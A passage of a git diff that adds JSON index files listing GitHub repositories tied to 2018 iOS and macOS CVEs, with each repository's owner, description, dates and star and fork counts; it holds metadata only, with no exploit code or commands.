"watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4084.json b/2018/CVE-2018-4084.json new file mode 100644 index 0000000000..0d3b713be7 --- /dev/null +++ b/2018/CVE-2018-4084.json @@ -0,0 +1,33 @@ +[ + { + "id": 505599002, + "name": "wifi_leak", + "full_name": "dybrkr\/wifi_leak", + "owner": { + "login": "dybrkr", + "id": 31037639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31037639?v=4", + "html_url": "https:\/\/github.com\/dybrkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dybrkr\/wifi_leak", + "description": "[CVE-2018-4084]", + "fork": false, + "created_at": "2022-06-20T21:10:22Z", + "updated_at": "2022-06-20T21:12:38Z", + "pushed_at": "2022-06-20T21:14:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4087.json b/2018/CVE-2018-4087.json new file mode 100644 index 0000000000..0eacc73ea6 --- /dev/null +++ b/2018/CVE-2018-4087.json @@ -0,0 +1,107 @@ +[ + { + "id": 122336305, + "name": "bluetoothdPoC", + "full_name": "rani-i\/bluetoothdPoC", + "owner": { + "login": "rani-i", + "id": 25133607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25133607?v=4", + "html_url": "https:\/\/github.com\/rani-i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rani-i\/bluetoothdPoC", + "description": "CVE-2018-4087 PoC", + "fork": false, + "created_at": "2018-02-21T12:55:37Z", + "updated_at": "2023-11-02T05:10:34Z", + "pushed_at": "2019-02-18T14:43:08Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 66, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "poc" + ], + "visibility": "public", + "forks": 66, + "watchers": 60, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 123298406, + "name": "UnjailMe", + "full_name": "MTJailed\/UnjailMe", + "owner": { + "login": "MTJailed", + "id": 31187886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31187886?v=4", + "html_url": "https:\/\/github.com\/MTJailed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MTJailed\/UnjailMe", + "description": "A sandbox escape based on the proof-of-concept (CVE-2018-4087) by Rani Idan (Zimperium)", + "fork": false, + "created_at": "2018-02-28T14:45:06Z", + "updated_at": "2024-06-16T07:12:23Z", + "pushed_at": "2018-05-08T10:59:23Z", + "stargazers_count": 82, + "watchers_count": 82, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "abraham-masri", + "bug", + "cve-2018-4087", + "ios11", + "rop", + "sandbox", + "userland", + "vulnerability", + "zimperium" + ], + "visibility": "public", + "forks": 23, + "watchers": 82, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 124429247, + "name": "Exploit11.2", + "full_name": "joedaguy\/Exploit11.2", + "owner": { + "login": "joedaguy", + "id": 37167590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37167590?v=4", + "html_url": "https:\/\/github.com\/joedaguy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joedaguy\/Exploit11.2", + "description": "Exploit iOS 11.2.x by ZIMPERIUM and semi-completed by me. Sandbox escapes on CVE-2018-4087. ", + "fork": false, + "created_at": "2018-03-08T18:04:31Z", + "updated_at": "2024-08-12T19:36:47Z", + "pushed_at": "2018-03-08T15:41:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4110.json b/2018/CVE-2018-4110.json new file mode 100644 index 0000000000..908aec9566 --- /dev/null +++ b/2018/CVE-2018-4110.json @@ -0,0 +1,33 @@ +[ + { + "id": 105685717, + "name": "ios11-cookie-set-expire-issue", + "full_name": "bencompton\/ios11-cookie-set-expire-issue", + "owner": { + "login": "bencompton", + "id": 3343482, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3343482?v=4", + "html_url": "https:\/\/github.com\/bencompton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bencompton\/ios11-cookie-set-expire-issue", + "description": "Reproduction of iOS 11 bug CVE-2018-4110", + "fork": false, + "created_at": "2017-10-03T18:09:30Z", + "updated_at": "2022-09-09T16:50:43Z", + "pushed_at": "2017-10-16T15:07:13Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4121.json b/2018/CVE-2018-4121.json new file mode 100644 index 0000000000..898c9ad4e0 --- /dev/null +++ b/2018/CVE-2018-4121.json @@ -0,0 +1,95 @@ +[ + { + "id": 130184573, + "name": "CVE-2018-4121", + "full_name": "FSecureLABS\/CVE-2018-4121", + "owner": { + "login": "FSecureLABS", + "id": 1469843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1469843?v=4", + "html_url": "https:\/\/github.com\/FSecureLABS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FSecureLABS\/CVE-2018-4121", + "description": "macOS 10.13.3 (17D47) Safari Wasm Exploit ", + "fork": false, + "created_at": "2018-04-19T08:33:12Z", + "updated_at": "2024-08-12T19:37:52Z", + "pushed_at": "2018-04-19T11:20:41Z", + "stargazers_count": 119, + "watchers_count": 119, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 119, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 141314432, + "name": "CVE-2018-4121", + "full_name": "likekabin\/CVE-2018-4121", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2018-4121", + "description": null, + "fork": false, + "created_at": "2018-07-17T16:15:29Z", + "updated_at": "2018-07-17T16:15:44Z", + "pushed_at": "2018-07-17T16:15:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 147746670, + "name": "CVE-2018-4121", + "full_name": "jezzus\/CVE-2018-4121", + "owner": { + "login": "jezzus", + "id": 9899999, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9899999?v=4", + "html_url": "https:\/\/github.com\/jezzus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jezzus\/CVE-2018-4121", + "description": null, + "fork": false, + "created_at": "2018-09-06T23:55:43Z", + "updated_at": "2018-09-06T23:55:53Z", + "pushed_at": "2018-09-06T23:55:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4124.json b/2018/CVE-2018-4124.json new file mode 100644 index 0000000000..7147c305d9 --- /dev/null +++ b/2018/CVE-2018-4124.json @@ -0,0 +1,33 @@ +[ + { + "id": 179321381, + "name": "TELUGU_CVE-2018-4124_POC", + "full_name": "jamf\/TELUGU_CVE-2018-4124_POC", + "owner": { + "login": "jamf", + "id": 1423569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1423569?v=4", + "html_url": "https:\/\/github.com\/jamf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jamf\/TELUGU_CVE-2018-4124_POC", + "description": null, + "fork": false, + "created_at": "2019-04-03T15:44:43Z", + "updated_at": "2024-08-12T19:47:33Z", + "pushed_at": "2019-04-03T15:46:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4150.json b/2018/CVE-2018-4150.json new file mode 100644 index 0000000000..6b315dc7da --- /dev/null +++ b/2018/CVE-2018-4150.json @@ -0,0 +1,95 @@ +[ + { + "id": 132634317, + "name": "CVE-2018-4150", + "full_name": "Jailbreaks\/CVE-2018-4150", + "owner": { + "login": "Jailbreaks", + "id": 25392316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25392316?v=4", + "html_url": "https:\/\/github.com\/Jailbreaks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jailbreaks\/CVE-2018-4150", + "description": "Proof of concept for CVE-2018-4150 by @cmwdotme ", + "fork": false, + "created_at": "2018-05-08T16:12:59Z", + "updated_at": "2024-08-12T19:38:24Z", + "pushed_at": "2018-05-08T16:14:50Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 14, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 132916613, + "name": "LovelySn0w", + "full_name": "rpwnage\/LovelySn0w", + "owner": { + "login": "rpwnage", + "id": 33968601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33968601?v=4", + "html_url": "https:\/\/github.com\/rpwnage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rpwnage\/LovelySn0w", + "description": "a iOS CVE-2018-4150 Application example.", + "fork": false, + "created_at": "2018-05-10T15:04:44Z", + "updated_at": "2021-03-07T13:25:09Z", + "pushed_at": "2018-05-14T14:32:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 135454936, + "name": "incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-", + "full_name": "littlelailo\/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-", + "owner": { + "login": "littlelailo", + "id": 28736661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28736661?v=4", + "html_url": "https:\/\/github.com\/littlelailo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/littlelailo\/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-", + "description": "incomplete exploit for CVE-2018-4150 (by cmwdotme) for devices without SMAP", + "fork": false, + "created_at": "2018-05-30T14:29:37Z", + "updated_at": "2024-08-12T19:38:56Z", + "pushed_at": "2018-05-30T14:39:55Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4185.json b/2018/CVE-2018-4185.json new file mode 100644 index 0000000000..61945d6b7e --- /dev/null +++ b/2018/CVE-2018-4185.json @@ -0,0 +1,95 @@ +[ + { + "id": 123051746, + "name": "x18-leak", + "full_name": "bazad\/x18-leak", + "owner": { + "login": "bazad", + "id": 3111637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3111637?v=4", + "html_url": "https:\/\/github.com\/bazad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bazad\/x18-leak", + "description": "CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.", + "fork": false, + "created_at": "2018-02-27T00:58:39Z", + "updated_at": "2024-08-12T19:36:32Z", + "pushed_at": "2018-03-07T08:07:29Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 83, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 470837048, + "name": "bazad1", + "full_name": "xigexbh\/bazad1", + "owner": { + "login": "xigexbh", + "id": 101782663, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101782663?v=4", + "html_url": "https:\/\/github.com\/xigexbh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xigexbh\/bazad1", + "description": "CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.", + "fork": false, + "created_at": "2022-03-17T03:38:01Z", + "updated_at": "2022-03-17T03:38:01Z", + "pushed_at": "2022-03-17T03:38:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480064531, + "name": "bazad1", + "full_name": "Giler2004\/bazad1", + "owner": { + "login": "Giler2004", + "id": 103375785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103375785?v=4", + "html_url": "https:\/\/github.com\/Giler2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Giler2004\/bazad1", + "description": "CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.", + "fork": false, + "created_at": "2022-04-10T15:50:41Z", + "updated_at": "2022-04-10T15:50:41Z", + "pushed_at": "2022-04-10T15:50:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4193.json b/2018/CVE-2018-4193.json new file mode 100644 index 0000000000..64752686b5 --- /dev/null +++ b/2018/CVE-2018-4193.json @@ -0,0 +1,33 @@ +[ + { + "id": 170509373, + "name": "CVE-2018-4193", + "full_name": "Synacktiv-contrib\/CVE-2018-4193", + "owner": { + "login": "Synacktiv-contrib", + "id": 28860793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28860793?v=4", + "html_url": "https:\/\/github.com\/Synacktiv-contrib", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Synacktiv-contrib\/CVE-2018-4193", + "description": "exploit for CVE-2018-4193", + "fork": false, + "created_at": "2019-02-13T13:06:11Z", + "updated_at": "2022-07-24T14:07:42Z", + "pushed_at": "2019-02-13T13:07:25Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 70, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4233.json b/2018/CVE-2018-4233.json new file mode 100644 index 0000000000..727f69ae63 --- /dev/null +++ b/2018/CVE-2018-4233.json @@ -0,0 +1,33 @@ +[ + { + "id": 144027153, + "name": "cve-2018-4233", + "full_name": "saelo\/cve-2018-4233", + "owner": { + "login": "saelo", + "id": 2453290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2453290?v=4", + "html_url": "https:\/\/github.com\/saelo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saelo\/cve-2018-4233", + "description": "Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018", + "fork": false, + "created_at": "2018-08-08T14:41:20Z", + "updated_at": "2024-11-01T02:31:05Z", + "pushed_at": "2024-02-07T23:51:49Z", + "stargazers_count": 180, + "watchers_count": 180, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 180, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4241.json b/2018/CVE-2018-4241.json new file mode 100644 index 0000000000..ed6dd70b72 --- /dev/null +++ b/2018/CVE-2018-4241.json @@ -0,0 +1,33 @@ +[ + { + "id": 136248519, + "name": "multi_path", + "full_name": "0neday\/multi_path", + "owner": { + "login": "0neday", + "id": 15697803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15697803?v=4", + "html_url": "https:\/\/github.com\/0neday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0neday\/multi_path", + "description": "CVE-2018-4241: XNU kernel heap overflow due to bad bounds checking in MPTCP for iOS 11 - 11.3.1released by Ian Beer", + "fork": false, + "created_at": "2018-06-06T00:07:01Z", + "updated_at": "2020-12-04T15:46:11Z", + "pushed_at": "2018-06-06T23:57:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4242.json b/2018/CVE-2018-4242.json new file mode 100644 index 0000000000..a5bb2b3173 --- /dev/null +++ b/2018/CVE-2018-4242.json @@ -0,0 +1,33 @@ +[ + { + "id": 160888223, + "name": "Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-", + "full_name": "yeonnic\/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-", + "owner": { + "login": "yeonnic", + "id": 23390602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23390602?v=4", + "html_url": "https:\/\/github.com\/yeonnic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yeonnic\/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-", + "description": null, + "fork": false, + "created_at": "2018-12-08T00:13:28Z", + "updated_at": "2018-12-21T06:43:45Z", + "pushed_at": "2018-12-08T02:15:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4243.json b/2018/CVE-2018-4243.json new file mode 100644 index 0000000000..afe1280040 --- /dev/null +++ b/2018/CVE-2018-4243.json @@ -0,0 +1,33 @@ +[ + { + "id": 137236042, + "name": "empty_list", + "full_name": "Jailbreaks\/empty_list", + "owner": { + "login": "Jailbreaks", + "id": 25392316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25392316?v=4", + "html_url": "https:\/\/github.com\/Jailbreaks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jailbreaks\/empty_list", + "description": "empty_list - exploit for p0 issue 1564 (CVE-2018-4243) iOS 11.0 - 11.3.1 kernel r\/w", + "fork": false, + "created_at": "2018-06-13T15:38:18Z", + "updated_at": "2022-09-03T03:27:37Z", + "pushed_at": "2018-06-13T15:40:15Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4248.json b/2018/CVE-2018-4248.json new file mode 100644 index 0000000000..054f5701ec --- /dev/null +++ b/2018/CVE-2018-4248.json @@ -0,0 +1,33 @@ +[ + { + "id": 132848731, + "name": "xpc-string-leak", + "full_name": "bazad\/xpc-string-leak", + "owner": { + "login": "bazad", + "id": 3111637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3111637?v=4", + "html_url": "https:\/\/github.com\/bazad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bazad\/xpc-string-leak", + "description": "CVE-2018-4248: Out-of-bounds read in libxpc during string serialization.", + "fork": false, + "created_at": "2018-05-10T04:31:38Z", + "updated_at": "2024-08-12T19:38:26Z", + "pushed_at": "2018-07-10T00:05:46Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 52, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4280.json b/2018/CVE-2018-4280.json new file mode 100644 index 0000000000..7b3cc50726 --- /dev/null +++ b/2018/CVE-2018-4280.json @@ -0,0 +1,64 @@ +[ + { + "id": 118415497, + "name": "launchd-portrep", + "full_name": "bazad\/launchd-portrep", + "owner": { + "login": "bazad", + "id": 3111637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3111637?v=4", + "html_url": "https:\/\/github.com\/bazad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bazad\/launchd-portrep", + "description": "CVE-2018-4280: Mach port replacement vulnerability in launchd on macOS 10.13.5 leading to local privilege escalation and SIP bypass.", + "fork": false, + "created_at": "2018-01-22T06:22:59Z", + "updated_at": "2024-08-12T19:35:41Z", + "pushed_at": "2018-10-28T20:23:30Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 58, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 122551718, + "name": "blanket", + "full_name": "bazad\/blanket", + "owner": { + "login": "bazad", + "id": 3111637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3111637?v=4", + "html_url": "https:\/\/github.com\/bazad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bazad\/blanket", + "description": "CVE-2018-4280: Mach port replacement vulnerability in launchd on iOS 11.2.6 leading to sandbox escape, privilege escalation, and codesigning bypass.", + "fork": false, + "created_at": "2018-02-23T00:19:05Z", + "updated_at": "2024-11-12T06:05:37Z", + "pushed_at": "2018-11-13T00:26:18Z", + "stargazers_count": 247, + "watchers_count": 247, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 247, + "score": 0, + "subscribers_count": 15 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4327.json b/2018/CVE-2018-4327.json new file mode 100644 index 0000000000..552201a02e --- /dev/null +++ b/2018/CVE-2018-4327.json @@ -0,0 +1,64 @@ +[ + { + "id": 148367467, + "name": "brokentooth", + "full_name": "omerporze\/brokentooth", + "owner": { + "login": "omerporze", + "id": 6332303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6332303?v=4", + "html_url": "https:\/\/github.com\/omerporze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omerporze\/brokentooth", + "description": " POC for CVE-2018-4327", + "fork": false, + "created_at": "2018-09-11T19:15:09Z", + "updated_at": "2024-08-12T19:41:35Z", + "pushed_at": "2018-09-13T15:59:05Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 41, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 148547298, + "name": "POC-CVE-2018-4327-and-CVE-2018-4330", + "full_name": "harryanon\/POC-CVE-2018-4327-and-CVE-2018-4330", + "owner": { + "login": "harryanon", + "id": 37672417, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37672417?v=4", + "html_url": "https:\/\/github.com\/harryanon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/harryanon\/POC-CVE-2018-4327-and-CVE-2018-4330", + "description": null, + "fork": false, + "created_at": "2018-09-12T22:00:58Z", + "updated_at": "2018-09-30T09:47:45Z", + "pushed_at": "2018-09-12T22:01:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4330.json b/2018/CVE-2018-4330.json new file mode 100644 index 0000000000..14229d4ab5 --- /dev/null +++ b/2018/CVE-2018-4330.json @@ -0,0 +1,33 @@ +[ + { + "id": 148663645, + "name": "toothfairy", + "full_name": "omerporze\/toothfairy", + "owner": { + "login": "omerporze", + "id": 6332303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6332303?v=4", + "html_url": "https:\/\/github.com\/omerporze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omerporze\/toothfairy", + "description": "CVE-2018-4330 POC for iOS", + "fork": false, + "created_at": "2018-09-13T16:05:20Z", + "updated_at": "2024-02-01T07:01:02Z", + "pushed_at": "2018-09-13T18:34:20Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4331.json b/2018/CVE-2018-4331.json new file mode 100644 index 0000000000..8326ff664c --- /dev/null +++ b/2018/CVE-2018-4331.json @@ -0,0 +1,33 @@ +[ + { + "id": 114446755, + "name": "gsscred-race", + "full_name": "bazad\/gsscred-race", + "owner": { + "login": "bazad", + "id": 3111637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3111637?v=4", + "html_url": "https:\/\/github.com\/bazad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bazad\/gsscred-race", + "description": "CVE-2018-4331: Exploit for a race condition in the GSSCred system service on iOS 11.2.", + "fork": false, + "created_at": "2017-12-16T08:48:08Z", + "updated_at": "2024-08-12T19:34:50Z", + "pushed_at": "2018-01-09T07:23:15Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 24, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4343.json b/2018/CVE-2018-4343.json new file mode 100644 index 0000000000..582fe2bd71 --- /dev/null +++ b/2018/CVE-2018-4343.json @@ -0,0 +1,33 @@ +[ + { + "id": 113555592, + "name": "gsscred-move-uaf", + "full_name": "bazad\/gsscred-move-uaf", + "owner": { + "login": "bazad", + "id": 3111637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3111637?v=4", + "html_url": "https:\/\/github.com\/bazad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bazad\/gsscred-move-uaf", + "description": "CVE-2018-4343: Proof-of-concept for a use-after-free in the GSSCred daemon on macOS and iOS.", + "fork": false, + "created_at": "2017-12-08T09:15:37Z", + "updated_at": "2024-08-12T19:34:38Z", + "pushed_at": "2017-12-09T23:23:47Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4407.json b/2018/CVE-2018-4407.json new file mode 100644 index 0000000000..e21ffb76dd --- /dev/null +++ b/2018/CVE-2018-4407.json @@ -0,0 +1,533 @@ +[ + { + "id": 155684007, + "name": "check_icmp_dos", + "full_name": "Pa55w0rd\/check_icmp_dos", + "owner": { + "login": "Pa55w0rd", + "id": 16274549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16274549?v=4", + "html_url": "https:\/\/github.com\/Pa55w0rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pa55w0rd\/check_icmp_dos", + "description": "iOS 12 \/ OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC", + "fork": false, + "created_at": "2018-11-01T08:21:59Z", + "updated_at": "2024-08-12T19:42:55Z", + "pushed_at": "2018-11-01T08:53:23Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 59, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 155748281, + "name": "cve-2018-4407", + "full_name": "unixpickle\/cve-2018-4407", + "owner": { + "login": "unixpickle", + "id": 406021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/406021?v=4", + "html_url": "https:\/\/github.com\/unixpickle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unixpickle\/cve-2018-4407", + 